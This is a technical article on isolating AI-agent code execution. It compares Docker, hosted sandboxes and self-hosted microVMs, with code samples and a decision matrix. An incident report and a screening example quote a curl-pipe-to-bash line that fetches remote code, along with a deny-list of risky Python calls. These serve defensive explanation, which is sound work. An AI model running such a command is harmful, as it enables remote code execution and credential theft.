Sandboxing Code Execution in AI Agents: From Docker to microVMs, a Decision Matrix
A side-by-side comparison of six sandbox technologies, weighing latency, security, and ops cost.
When an agent needs to execute code that the user just wrote, run a SQL query, launch a browser, or invoke an unknown shell command, running it directly on the host puts every egg in one basket: one bad command compromises everything the host can reach. This article starts from a real production incident, then breaks down six mainstream sandbox technologies (Docker, E2B, Modal, Firecracker, gVisor, Kata Containers) and offers a copy-pasteable decision matrix.
A production incident: why agents must be sandboxed
In March 2025, one of our code-generation agents received the user prompt: "run pandas on this dataset, then plot the outliers with Plotly." The code from the model looked harmless — import pandas as pd, read a CSV, plotly.express.scatter. But the script also included a line os.system("curl https://x.example.com | bash"), which the LLM justified as "first fetch the data with curl, then process it." After execution, the MinIO credentials inside the container were exfiltrated to an external host.
The post-mortem produced three hard conclusions:
- Code-generation agent output is untrusted input. LLM-generated code must be treated like "input from a stranger on the internet."
- Default Docker isolation is not enough. privileged: true gives root, and mounting /var/run/docker.sock is immediate host takeover.
- "Isolation" is a layered concept. From "do not mount host directories" to "hardware-virtualized microVM," there are at least four distinct isolation tiers in between.
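The first conclusion can be made concrete with a small static screen that runs before any generated code is executed. This is a minimal sketch, not a security boundary: the deny-list RISKY_CALLS and the helper names are assumptions made up for illustration, and the check is easy to bypass (aliased imports, getattr, string building). It is useful as a logging and triage signal in front of a real sandbox, never instead of one.

```python
import ast

# Hypothetical deny-list for illustration; a real policy would be broader.
RISKY_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "eval", "exec",
}


def dotted_name(node: ast.AST) -> str:
    """Return 'os.system' for an attribute chain, 'eval' for a bare name, else ''."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        prefix = dotted_name(node.value)
        return f"{prefix}.{node.attr}" if prefix else ""
    return ""


def find_risky_calls(source: str) -> list[str]:
    """List every call in `source` whose dotted name is on the deny-list."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                hits.append(name)
    return hits


# The shape of the script from the incident: harmless imports plus one shell call.
generated = (
    "import os\n"
    "import pandas as pd\n"
    'os.system("curl https://x.example.com | bash")\n'
)
print(find_risky_calls(generated))
```

A hit here would not have prevented the incident on its own, but it would have put the curl line in front of a reviewer or a policy engine before execution.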
This article walks through six sandbox options, roughly in order of isolation strength, from weakest to strongest.
L1: Container isolation (Docker / runC) — fastest, but only deters the well-behaved
Containers are the first stop for most agent teams. The code looks like this:
import docker

client = docker.from_env()
# With the default detach=False, run() blocks and returns the container's stdout as bytes
output = client.containers.run(
    "python:3.11-slim",
    command="python -c 'print(2+2)'",
    network_mode="none",   # cut network
    mem_limit="128m",      # memory cap
    pids_limit=64,         # process cap
    read_only=True,        # read-only rootfs
    user="1000:1000",      # non-root
    cap_drop=["ALL"],      # drop all capabilities
    remove=True,           # delete the container once it exits
)
print(output.decode())     # 4
The problem with containers is not performance (startup is sub-second) but unsafe defaults. Unless you explicitly pass cap_drop=["ALL"], the container keeps Docker's default capability set, which includes NET_RAW. Without network_mode="none", it joins the default bridge network with outbound internet access, so exfiltration like the curl call in the incident just works, and DNS or ARP spoofing against neighboring containers on the same bridge becomes possible. And because every container shares the host kernel, a single kernel exploit is a container escape.
Bottom line: containers are fine for "running my own audited code." They are not fine for LLM-generated code.
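If containers stay in the stack for audited code, the unsafe defaults can at least be caught before launch. The following is a sketch of a pre-flight check over the keyword arguments you would pass to docker-py's containers.run(); the function name audit_run_kwargs and the exact messages are assumptions for illustration, and the rule set is deliberately small.

```python
def audit_run_kwargs(kwargs: dict) -> list[str]:
    """Return the hardening problems found in docker-py style run() kwargs."""
    problems = []
    if kwargs.get("privileged"):
        problems.append("privileged=True gives the container near-host powers")
    if "ALL" not in kwargs.get("cap_drop", []):
        problems.append("cap_drop should include 'ALL'")
    if kwargs.get("cap_add"):
        problems.append(f"cap_add re-grants capabilities: {kwargs['cap_add']}")
    if kwargs.get("network_mode") != "none":
        problems.append("network_mode is not 'none'")
    if not kwargs.get("read_only"):
        problems.append("root filesystem is writable")
    if kwargs.get("user") in (None, "", "root", "0", "0:0"):
        problems.append("container runs as root")
    if "mem_limit" not in kwargs or "pids_limit" not in kwargs:
        problems.append("mem_limit and pids_limit should both be set")
    # volumes may be a dict keyed by host path or a list of 'host:container' strings
    for volume in kwargs.get("volumes", {}):
        if "docker.sock" in volume:
            problems.append("docker.sock is mounted: host takeover")
    return problems


hardened = dict(
    network_mode="none", mem_limit="128m", pids_limit=64,
    read_only=True, user="1000:1000", cap_drop=["ALL"],
)
print(audit_run_kwargs(hardened))             # hardened config: no findings
print(audit_run_kwargs({"privileged": True}))  # everything wrong at once
```

Failing the launch when the returned list is non-empty turns "remember to pass cap_drop" into something a code review cannot forget.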
L2: Hosted microVMs — what 90% of agent teams should buy
E2B and Modal are the two most adopted hosted sandboxes in the agent ecosystem, and neither relies on plain runC containers: E2B runs each sandbox in a Firecracker microVM, while Modal documents gVisor as its isolation layer. Their shared pitch: you start a sandbox from an SDK, cold start is sub-second, you pay for what you use, and you do not have to operate KVM/QEMU yourself.
E2B: notebook-style Python execution
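from e2b_code_interpreter import Sandbox

sb = Sandbox()  # sub-second cold start; expects E2B_API_KEY in the environment
try:
    execution = sb.run_code("import numpy as np; x = np.arange(10); print(x.sum())")
    print(execution.logs.stdout)  # stdout captured inside the sandbox; the sum is 45
    # Stream output as it arrives; the IP printed is the sandbox's egress IP, not the host's
    sb.run_code("!curl https://api.ipify.org", on_stdout=lambda l: print(l))
finally:
    sb.kill()  # release the sandbox even if a call above raises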
E2B is built for long-lived notebook-style execution — the user writes a bit, runs it, inspects output, writes more. The filesystem persists inside the sandbox, and the agent can maintain state across run_code calls.
Modal: sandbox as a serverless function
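import modal

image = modal.Image.debian_slim().pip_install("pandas", "plotly")
app = modal.App("agent-sandbox")

@app.function(image=image, cpu=2, memory=512, timeout=60)
def analyze(df_bytes: bytes) -> bytes:
    import io
    import pickle
    import pandas as pd

    # read_pickle needs a path or file-like object, so wrap the raw bytes
    df = pd.read_pickle(io.BytesIO(df_bytes))
    # to_pickle() writes to a path and returns None; serialize in memory instead
    return pickle.dumps(df.describe())

@app.local_entrypoint()
def main():
    print(analyze.remote(b"..."))  # the body runs remotely in Modal's sandbox, not in this process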
Modal's strength is treating the sandbox as a function. The call semantics of analyze.remote(...) are just normal Python RPC; the only difference is that the body runs in an isolated remote sandbox rather than in-process. For the agent, this means "call a tool" and "execute untrusted code" look identical at the API layer.
E2B vs. Modal
- Choose E2B if your agent is a notebook / REPL experience that needs a long-lived filesystem and dynamic package installation.
- Choose Modal if your agent is "execute a single function on demand" with serverless elasticity, GPUs, or cron triggers.
- Choose neither if every byte of user data must stay in your own VPC (finance, healthcare): a hosted service runs your code and data on the vendor's infrastructure, which usually conflicts with strict data-residency rules.
L3: Build-your-own microVM — Firecracker, gVisor, Kata Containers
When compliance requires "data must not leave this data center," you have to self-host. The three projects have a clean division of labor:
- Firecracker (open-sourced by AWS): a minimal virtual machine monitor built on KVM. It drops most of the device emulation that a general-purpose VMM like QEMU carries, which gets cold start down to 125-250ms with under 5MB of memory overhead per microVM. AWS Lambda runs on it.
- gVisor (open-sourced by Google): intercepts the container's system calls and implements them in a user-space kernel, so the workload never talks to the host kernel directly. Cold start is slower than Firecracker (300-500ms), but it reuses Docker images directly.
- Kata Containers: wraps a microVM around a container, with OCI-standard images on the outside and KVM/QEMU isolation on the inside. It has the cleanest Kubernetes integration of the three.
Minimal Firecracker example
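# Terminal 1: start the VMM; it stays in the foreground and listens on the API socket
rm -f /tmp/fc.sock
firecracker --api-sock /tmp/fc.sock
# Terminal 2: configure the kernel, root drive, and machine size, then boot the microVM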
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/boot-source -d '{"kernel_image_path":"./vmlinux","boot_args":"console=ttyS0 reboot=k panic=1"}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/drives/rootfs -d '{"drive_id":"rootfs","path_on_host":"./rootfs.ext4","is_root_device":true,"is_read_only":false}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/machine-config -d '{"vcpu_count":2,"mem_size_mib":512}'
curl --unix-socket /tmp/fc.sock -X PUT http://localhost/actions -d '{"action_type":"InstanceStart"}'
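Cold start is 125-250ms. Each microVM has its own kernel and its own virtual NIC, so an attacker has to break out of the guest kernel and then the VMM, not just exploit a kernel shared with the host. The container-escape attack surface nearly disappears.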
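When an agent backend has to boot many microVMs, the four PUT requests above are usually generated rather than typed. Here is a minimal sketch that builds the same request sequence as data and renders it back to curl commands; the function names are assumptions for illustration, the payload fields are copied from the example above, and the Content-Type header is added as a conservative default. Nothing here talks to a real socket.

```python
import json


def firecracker_boot_requests(kernel: str, rootfs: str,
                              vcpus: int = 2, mem_mib: int = 512):
    """Return the (path, JSON body) pairs to PUT, in order, to boot one microVM."""
    return [
        ("/boot-source", {"kernel_image_path": kernel,
                          "boot_args": "console=ttyS0 reboot=k panic=1"}),
        ("/drives/rootfs", {"drive_id": "rootfs", "path_on_host": rootfs,
                            "is_root_device": True, "is_read_only": False}),
        ("/machine-config", {"vcpu_count": vcpus, "mem_size_mib": mem_mib}),
        ("/actions", {"action_type": "InstanceStart"}),
    ]


def as_curl(sock: str, path: str, body: dict) -> str:
    """Render one request as the equivalent curl command line."""
    return (f"curl --unix-socket {sock} -X PUT http://localhost{path} "
            f"-H 'Content-Type: application/json' -d '{json.dumps(body)}'")


for path, body in firecracker_boot_requests("./vmlinux", "./rootfs.ext4"):
    print(as_curl("/tmp/fc.sock", path, body))
```

Keeping the sequence as plain data makes it easy to give every microVM its own socket path and rootfs copy, which is what per-execution isolation needs.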
Minimal gVisor example
# run Docker on top of gVisor
docker run --runtime=runsc -it python:3.11 bash
# runsc is gVisor's runC replacement
gVisor does not create a microVM. Instead, it redirects every syscall to a user-space "Sentry" process that implements it. Performance is worse than Firecracker on syscall-heavy workloads (the syscall path is 5-10x longer), but it runs standard Docker images unchanged, which keeps ops cost low.
Minimal Kata Containers example
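# Kubernetes pod spec (assumes a RuntimeClass named kata-qemu is installed on the cluster)
apiVersion: v1
kind: Pod
metadata:
  name: agent-sandbox  # illustrative name; a Pod needs one to be valid
spec:
  runtimeClassName: kata-qemu
  containers:
    - name: agent
      image: python:3.11-slim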
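kata-qemu is the name of a RuntimeClass, which maps to a Kata handler configured in the node's CRI runtime (containerd or CRI-O). When a normal Pod sets runtimeClassName: kata-qemu, the kubelet asks that runtime to boot a microVM and start the Pod's containers inside it. The application needs zero changes, which makes this the lowest migration cost of the three.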
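An agent backend typically creates one Pod per execution, so the manifest is generated in code. The sketch below builds such a manifest as a plain dict and prints it as JSON, which kubectl accepts alongside YAML. The function name sandbox_pod, the Pod name, and the resource limits are assumptions for illustration; restartPolicy and automountServiceAccountToken are standard Pod fields added here because they matter for untrusted code.

```python
import json


def sandbox_pod(name: str, image: str, runtime_class: str = "kata-qemu") -> dict:
    """Build a Pod manifest that requests a VM-backed runtime via runtimeClassName."""
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name},
        "spec": {
            "runtimeClassName": runtime_class,
            # One-shot execution: never restart untrusted code automatically.
            "restartPolicy": "Never",
            # Keep cluster credentials out of the sandbox.
            "automountServiceAccountToken": False,
            "containers": [{
                "name": "agent",
                "image": image,
                "resources": {"limits": {"cpu": "1", "memory": "512Mi"}},
            }],
        },
    }


print(json.dumps(sandbox_pod("agent-run-1", "python:3.11-slim"), indent=2))
```

Because only runtime_class changes, the same builder can target a gVisor RuntimeClass if the cluster defines one, which keeps the choice of isolation layer out of application code.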
L4: Decision matrix
| Dimension | Docker | E2B | Modal | Firecracker | gVisor | Kata |
|---|---|---|---|---|---|---|
| Cold start | < 1s | < 1s | < 1s | 125-250ms | 300-500ms | 500-800ms |
| Memory overhead | ~10MB | ~50MB | ~50MB | < 5MB | ~30MB | ~150MB |
| Isolation strength | weak | strong | strong | extreme | strong | extreme |
| Network isolation | config required | default isolated | default isolated | fully virtual | namespace | fully virtual |
| Image compatibility | 100% | custom | custom | custom kernel + rootfs | 100% Docker | 100% OCI |
| Self-ops burden | low | zero | zero | high | medium | medium |
| Per-instance cost | $0 | $0.000025/s | $0.0003/s | hardware | hardware | hardware |
| Data residency | self-managed | vendor cloud | vendor cloud | self-managed | self-managed | self-managed |
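The per-instance cost row is easier to compare once it is converted into a monthly figure. This is a small sketch of that arithmetic: the two per-second prices are the ones in the matrix, while the workload (200,000 sessions of 12 minutes) and the function name are assumptions chosen for illustration. It ignores idle time, minimum billing increments, and volume discounts.

```python
def monthly_sandbox_cost(sessions_per_month: int, minutes_per_session: float,
                         price_per_second: float) -> float:
    """Monthly spend in dollars for sandboxes billed per second of wall-clock time."""
    seconds = sessions_per_month * minutes_per_session * 60
    return seconds * price_per_second


# Per-second prices taken from the matrix; the workload is illustrative.
for name, price in [("E2B", 0.000025), ("Modal", 0.0003)]:
    cost = monthly_sandbox_cost(200_000, 12, price)
    print(f"{name}: ${cost:,.0f}/month")
```

The self-hosted columns say "hardware" because their cost is dominated by fixed capacity and engineering time, so the fair comparison is this monthly figure against a server budget plus the people who run it.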
Decision framework: four steps to pick
1. Can the data leave your own infrastructure (VPC or data center)?
   - Yes → a hosted sandbox (E2B or Modal) is fast and cheap; step 2 picks between them.
   - No → skip to step 3.
2. Do you need GPUs?
   - Yes → Modal: the most mature GPU sandbox.
   - No → E2B or Modal, per the comparison above.
3. Do you already have a Kubernetes cluster?
   - Yes → Kata Containers: zero-invasiveness CRI integration.
   - No → continue to step 4.
4. Do you want to reuse existing Docker images?
   - Yes → gVisor: swap the runtime, that's it.
   - No → Firecracker: the lightest option.
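The funnel can be written down as a function, which is handy for putting the decision into a design doc or a test. This is one possible reading, not the only one: it assumes the GPU question only distinguishes between the hosted options, so a team whose data must stay in-house goes straight to the self-hosted questions. The function name and the returned strings are made up for illustration.

```python
def pick_sandbox(data_can_leave: bool, needs_gpu: bool,
                 has_kubernetes: bool, reuse_docker_images: bool) -> str:
    """Walk the four questions in order and return the first match."""
    if data_can_leave:
        # Hosted tier: in this sketch, the GPU question only matters here.
        return "Modal" if needs_gpu else "E2B or Modal"
    if has_kubernetes:
        return "Kata Containers"
    if reuse_docker_images:
        return "gVisor"
    return "Firecracker"


# A regulated team with an existing cluster lands on Kata regardless of GPU needs.
print(pick_sandbox(data_can_leave=False, needs_gpu=True,
                   has_kubernetes=True, reuse_docker_images=True))
```

Ordering the checks this way encodes the article's priority: data residency first, convenience last.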
Common failure modes
Mistake 1: treating Docker as a "good enough" sandbox. Docker's isolation comes from namespaces and cgroups, not hardware virtualization. A single careless cap_add (SYS_ADMIN, for example) or privileged: true can hand the agent root-equivalent power on the host. LLM-generated code must be treated as untrusted input.
Mistake 2: hosted sandboxes leaking processes. If your own process crashes before it calls kill(), the hosted sandbox is not necessarily cleaned up and can keep running, and billing, until its timeout expires. In production, add a 30-second "idle auto-kill" heartbeat, or your monthly bill will explode.
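One way to build the idle auto-kill is a small reaper that records a heartbeat on every sandbox call and kills anything that has been quiet for too long. The class below is a sketch under stated assumptions: IdleReaper and its method names are hypothetical, the kill callback stands in for whatever your SDK uses to terminate a sandbox by ID, and reap() is meant to be called periodically by a timer or background thread that is not shown.

```python
import time
from typing import Callable, Dict, List


class IdleReaper:
    """Track last-activity times and kill sandboxes idle longer than `idle_seconds`."""

    def __init__(self, kill: Callable[[str], None], idle_seconds: float = 30.0,
                 clock: Callable[[], float] = time.monotonic):
        self._kill = kill
        self._idle_seconds = idle_seconds
        self._clock = clock  # injectable so tests do not have to sleep
        self._last_seen: Dict[str, float] = {}

    def heartbeat(self, sandbox_id: str) -> None:
        """Call on every code execution to mark the sandbox as active."""
        self._last_seen[sandbox_id] = self._clock()

    def reap(self) -> List[str]:
        """Kill every sandbox whose last heartbeat is too old; return their IDs."""
        now = self._clock()
        expired = [sid for sid, seen in self._last_seen.items()
                   if now - seen > self._idle_seconds]
        for sid in expired:
            self._kill(sid)
            # Forget the sandbox only after kill succeeded, so a failed kill
            # leaves the entry in place and is retried on the next reap().
            del self._last_seen[sid]
        return expired
```

Running the reaper in a process separate from the agent is the important design choice: the leak happens precisely when the agent process dies, so the cleanup cannot live inside it.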
Mistake 3: forgetting network policy on self-built microVMs. A microVM isolates CPU, memory, and the kernel, and it gets its own virtual NIC, but nothing restricts where that NIC can send traffic by default. You must configure iptables or Cilium to restrict east-west traffic between microVMs.
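For the iptables route, the rules can be generated from the list of host-side TAP devices. The sketch below assumes each microVM has its own TAP device and that traffic between them is routed by the host rather than switched on a shared Linux bridge (bridged traffic needs a different mechanism). The function name and device names are hypothetical; the rule syntax uses only the standard -A, -i, -o, and -j options.

```python
from itertools import permutations
from typing import List


def east_west_drop_rules(tap_devices: List[str]) -> List[str]:
    """One FORWARD/DROP rule per ordered pair of TAP devices, blocking VM-to-VM traffic."""
    return [f"iptables -A FORWARD -i {src} -o {dst} -j DROP"
            for src, dst in permutations(tap_devices, 2)]


for rule in east_west_drop_rules(["tap0", "tap1", "tap2"]):
    print(rule)
```

The rule count grows quadratically with the number of microVMs. iptables also accepts a trailing + as an interface-name wildcard, so a single rule matching tap+ on both sides is the more practical form at scale if all sandbox devices share a prefix.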
Mistake 4: underestimating gVisor's performance cost. gVisor's syscall interception path is 5-10x longer than native, which noticeably slows I/O-heavy tasks such as ETL. If your agent is data-processing heavy, gVisor is not the first choice.
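Rather than trusting a published multiplier, it is quick to measure the syscall cost on your own workload shape. The following is a rough micro-benchmark sketch: run it once under the default runtime and once under runsc with the same image, then compare the two rates. The function name is an assumption, os.stat is just one convenient syscall-bound operation, and a single-call loop like this overstates the impact on workloads that do large sequential reads.

```python
import os
import time


def stat_calls_per_second(iterations: int = 50_000) -> float:
    """Rough rate of os.stat() calls, each of which issues at least one syscall."""
    start = time.perf_counter()
    for _ in range(iterations):
        os.stat(".")
    # Guard against a zero interval on very coarse clocks.
    elapsed = max(time.perf_counter() - start, 1e-9)
    return iterations / elapsed


print(f"{stat_calls_per_second():,.0f} stat calls/s")
```

If the ratio between the two runs is small for your real ETL job, gVisor's ops simplicity may still be worth it; if it is large, that is the signal to look at Firecracker or Kata instead.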
Summary
- Sandboxes are not optional. LLM-generated code must be treated as untrusted input.
- Hosted (E2B / Modal) is the right answer for 90% of agent teams; self-built microVMs (Firecracker / gVisor / Kata) are the answer for compliance and data-residency requirements.
- Pick using the four-step funnel: data residency → GPU → K8s → Docker image compatibility.
- The sandbox itself is only the isolation layer. Network policy, image signing, process cleanup, and audit logs are the four additional things that must come with it.
A practical next step is to run a 30-minute proof-of-concept on E2B: wrap your agent's current "execute code locally" path inside a Sandbox(), measure the cold-start latency and the token cost impact, and then decide whether to commit to it long-term.
Three real-world case studies
Case 1: a public coding tutor agent. A consumer-facing coding tutor serving 200,000 monthly active students uses E2B as the execution backend. Each student session gets a fresh sandbox; the average session lasts 12 minutes, and the agent issues an average of 23 run_code calls per session. Cold start is amortized because the same sandbox is reused within a session. The team's primary concern is cost, not security: every minute of sandbox time costs about $0.0015, so 200,000 twelve-minute sessions a month come to roughly $3,600 in sandbox fees. The alternative, running on a self-managed K8s cluster, would have required a dedicated 4-person platform team. The hosted model wins on time-to-market.
Case 2: a fintech data agent with on-prem data. A fintech company built a SQL-plus-Python agent that operates directly on a regulated data lake that cannot leave the corporate VPC. The team evaluated all three self-hosted options and chose Kata Containers because their existing infrastructure already ran Kubernetes. The migration took two engineers six weeks. The main gotcha was disk I/O: Kata's QEMU-based microVM added 8-15% latency to heavy pandas operations compared to native containers, which was acceptable for their use case. They added Cilium network policies on top so that microVMs cannot talk to each other, only to the data lake via a pinned egress proxy.
Case 3: a CI tool for AI-generated pull requests. A developer-tooling company reviews AI-generated pull requests by running the proposed code in a sandbox and reporting the test results. They chose Firecracker over E2B because they need sub-second cold starts to keep the review feedback under 10 seconds end-to-end, and they need full control over the kernel to enforce a custom seccomp profile. The team built a small Rust scheduler that pre-warms a pool of microVMs and hands them out on demand, bringing the p50 time to a ready sandbox down to 80ms. Self-hosting Firecracker required 6 person-months upfront but reduced per-execution cost to roughly $0.00003, about 8x cheaper than the hosted alternative at their scale of 80,000 PRs per day.
The three cases share one pattern: the choice is dominated by data residency and cold-start latency, not by security features. All three achieve strong isolation because microVMs are strong isolation. What differs is where the microVMs run, who operates them, and how fast they spin up. A useful checklist for evaluation: (1) confirm the sandbox can be killed within 5 seconds when a runaway job is detected, (2) confirm network egress is logged to a queryable store, (3) confirm the kernel version is pinned and patchable, (4) confirm image signing is enforced for any container-to-microVM pipeline, and (5) confirm the cold-start p99 latency is documented in the SLA. Each of these is something a hosted service gives you for free but a self-hosted stack has to build deliberately.
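The pre-warmed pool from Case 3 is the piece most teams end up rebuilding, so a sketch of the idea may help. This is not the Rust scheduler described in the case study: WarmPool, its methods, and the boot callback are hypothetical names, and the refill step that would normally run on a background thread is called explicitly here to keep the example deterministic.

```python
import queue
from typing import Callable, Generic, TypeVar

T = TypeVar("T")


class WarmPool(Generic[T]):
    """Keep up to `size` pre-booted sandboxes ready; fall back to a cold boot when empty."""

    def __init__(self, boot: Callable[[], T], size: int):
        self._boot = boot
        self._ready: "queue.Queue[T]" = queue.Queue(maxsize=size)
        self.refill()

    def refill(self) -> None:
        """Top the pool back up; in production this would run in the background."""
        while not self._ready.full():
            self._ready.put_nowait(self._boot())

    def acquire(self) -> T:
        """Hand out a warm sandbox if one is ready, else pay the cold-start cost."""
        try:
            return self._ready.get_nowait()
        except queue.Empty:
            return self._boot()


# Stand-in boot function that just numbers the sandboxes it creates.
ids = iter(range(1000))
pool = WarmPool(boot=lambda: f"vm-{next(ids)}", size=2)
print(pool.acquire(), pool.acquire(), pool.acquire())
```

There is deliberately no release() method: a sandbox that has run untrusted code should be destroyed, not returned to the pool, so the pool only ever hands out fresh instances.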
Projects in this article
- E2B (12.7k ⭐): cloud code sandbox purpose-built for AI agents.
- Firecracker (35.1k ⭐): lightweight microVM runtime by AWS, designed for containers and functions.
- Kata Containers (8.1k ⭐): lightweight VM sandboxes with a container interface.
- gVisor (18.6k ⭐): Google's user-space kernel sandbox that intercepts container syscalls.